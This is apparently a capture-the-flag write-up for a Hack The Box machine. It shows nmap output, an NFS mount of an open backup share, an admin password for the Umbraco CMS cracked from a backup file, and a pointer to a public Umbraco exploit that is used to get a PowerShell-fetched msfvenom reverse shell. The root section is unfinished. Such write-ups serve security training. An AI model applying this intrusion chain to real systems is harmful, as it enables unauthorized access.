Recon

nmap

21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3,4 2049/tcp nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/udp mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100024 1 2049/tcp status
|_ 100024 1 2049/udp status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)

No surprise, let’s go to port 80 and take a look. Run gobuster in the background. Meanwhile, it seems that port 2049 (mountd) is really interesting. Let’s try to mount.

root@kali:/htb/Remote_180# showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
root@kali:
/htb/Remote_180# dir
root@kali:/htb/Remote_180# mkdir mount
root@kali:
/htb/Remote_180# mount -t nfs 10.10.10.180:/site_backups ./mount

Obviously there’s a remote directory that everyone could access. I mount it on local directory:mount. After mounting, it can be discovered that the shared folder is the backup_file for the server. The server is using a web framework called “Umbraco“. After some research and file enumeration, I can see that data file log “Umbraco.sdf“ is stored under App_Data. Cracking the hash inside, I get password for admin@htb.local (which is retrieved from access log): baconandcheese

User

Now I can login to the CMS. There are known exploits online: exploit-db 46153. Try with the python exploit. I wasted some time assumed that I could not get the response. Yet I can retrieve the information (through a simple burpsuite packet modification). Generating shell is not hard. Firstly use powershell to download a reverse shell bat file generated from msfvenom. Then execute the reverse shell in the same way.

Root

Have no ideas now… I know it should be some exploits related to TeamViewer, but for now, no progress.